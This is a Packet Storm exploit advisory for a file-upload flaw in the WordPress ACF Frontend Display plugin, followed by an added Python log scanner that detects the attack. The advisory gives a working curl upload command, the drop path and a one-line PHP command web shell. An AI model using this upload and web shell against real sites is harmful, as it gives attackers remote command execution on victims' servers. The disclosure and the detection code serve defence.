WordPress ACF Frontend Display Shell Upload

2015-07-06T00:00:00
ID PACKETSTORM:132590
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2015-07-06T00:00:00

Description

                                        
                                            `+---------------------------------------------------------------------------+   
#[+] Author: TUNISIAN CYBER   
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability   
#[+] Date: 3-07-2015   
#[+] Type: WebAPP   
#[+] Tested on: KaliLinux   
#[+] Friendly Sites: sec4ever.com   
#[+] Twitter: @TCYB3R   
+---------------------------------------------------------------------------+   
  
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"   
  
File Path:   
site/wp-content/uploads/uigen_YEAR/file.php   
  
Example:   
site/wp-content/uploads/uigen_2015/evil.php   
  
evil.php:   
<?php passthru($_GET['cmd']); ?>   
  
POC:   
http://i.imgur.com/7rQClr6.png   
  
  
TUNISIAN CYBER(miutex)-S4E  
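From the defender's side, an added example that is not part of the advisory or of the Packet Storm record: a small access-log scanner that flags the two request patterns the advisory implies, a POST to the blueimp jQuery-File-Upload server script bundled under the plugin's js/ directory, and any PHP script being requested out of wp-content/uploads/uigen_YEAR/. It assumes Apache/nginx combined-format logs; the sample lines are constructed.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" access-log layout: client, identity, user, [time], "request", status, bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Rule 1: POST to the blueimp jQuery-File-Upload server script shipped inside the plugin.
# The versioned folder (blueimp-jQuery-File-Upload-d45deb1 in the advisory) is matched generically.
UPLOAD_ENDPOINT_RE = re.compile(
    r'^/wp-content/plugins/acf-frontend-display/js/[^/]+/server/php/index\.php$'
)
# Rule 2: any PHP script requested out of the plugin's upload folder (wp-content/uploads/uigen_<year>/).
# Nothing legitimate executes PHP from there; a hit means an uploaded script is being reached.
UPLOADED_PHP_RE = re.compile(r'^/wp-content/uploads/uigen_\d{4}/[^/]+\.php$')


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if the line is benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]  # match on the path only; ignore the query string
    rule = None
    if m.group("method") == "POST" and UPLOAD_ENDPOINT_RE.match(path):
        rule = "acf_frontend_display_upload_post"
    elif UPLOADED_PHP_RE.match(path):
        rule = "php_executed_from_uigen_uploads"
    if rule is None:
        return None
    return {"rule": rule, "ip": m.group("ip"), "time": m.group("ts"),
            "path": path, "status": m.group("status")}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over a log and keep only the findings."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample log lines (not real traffic): one upload POST, one request for the
# dropped script, and two benign requests touching the same plugin and uploads trees.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jul/2015:10:12:01 +0000] "POST /wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php HTTP/1.1" 200 214 "-" "curl/7.38.0"',
    '198.51.100.7 - - [03/Jul/2015:10:12:05 +0000] "GET /wp-content/uploads/uigen_2015/evil.php?q=1 HTTP/1.1" 200 57 "-" "curl/7.38.0"',
    '203.0.113.5 - - [03/Jul/2015:10:13:40 +0000] "GET /wp-content/uploads/2015/07/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Jul/2015:10:13:41 +0000] "GET /wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/js/jquery.fileupload.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 on the first rule followed by a 200 on the second from the same client is the full sequence the advisory describes; the same two patterns translate directly into web-server or WAF rules that block POSTs to the bundled upload script and deny PHP execution under wp-content/uploads.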